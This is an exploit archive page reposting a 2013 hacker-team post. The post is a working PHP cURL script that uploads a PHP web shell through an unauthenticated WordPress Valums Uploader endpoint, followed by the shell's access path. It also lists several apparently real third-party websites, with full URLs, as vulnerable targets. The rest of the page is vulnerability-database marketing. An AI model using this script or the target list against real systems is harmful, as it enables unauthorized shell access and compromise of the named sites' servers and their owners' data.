Lucene search
K

WordPress Valums Uploader Shell Upload

🗓️ 04 Jan 2013 00:00:00Reported by JingoBDType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 38 Views

Wordpress Valums Uploader Shell Upload exploit by JingoBD targeting vulnerable WordPress sites for shell upload

Code
`# Exploit Title: Wordpress Valums Uploader Shell Upload Exploit  
# Date: 4-1-2013  
# Author: JingoBD  
# Tested on: Windows 7 And Ubuntu  
# Team: BANGLADESH CYBER ARMY  
# Greetz: ManInDark,Rex0Man,Evil AXE,Bedu33n,NEEL,AXIOM, And All Of My BCA Friends. They Rockz. :D   
ALSO ALL BANGLADESHI Hacker Team..   
  
=================== EXPLOIT====================  
<?php  
  
$uploadfile="bangla.php";   
$ch =  
curl_init("http://localhost/wordpress/VALUMS_UPLOADER_PATH/php.php");  
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,  
array('qqfile'=>"@$uploadfile"));  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
$postResult = curl_exec($ch);  
curl_close($ch);  
print "$postResult";  
  
?>  
  
Shell Access: http://localhost/wp-content/uploads/2013/01/bangla.php  
  
  
Some Vulnerable Sites:   
http://www.mmodels.ca/wp/wp-content/themes/lightspeed/framework/_scripts/valums_uploader/php.php  
http://www.yellowfly.co.uk/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php  
http://www3.mhcable.com/v2/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.phps  
  
=========================END======================  
  
Thanks  
http://facebook.com/bdcyberarmy  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation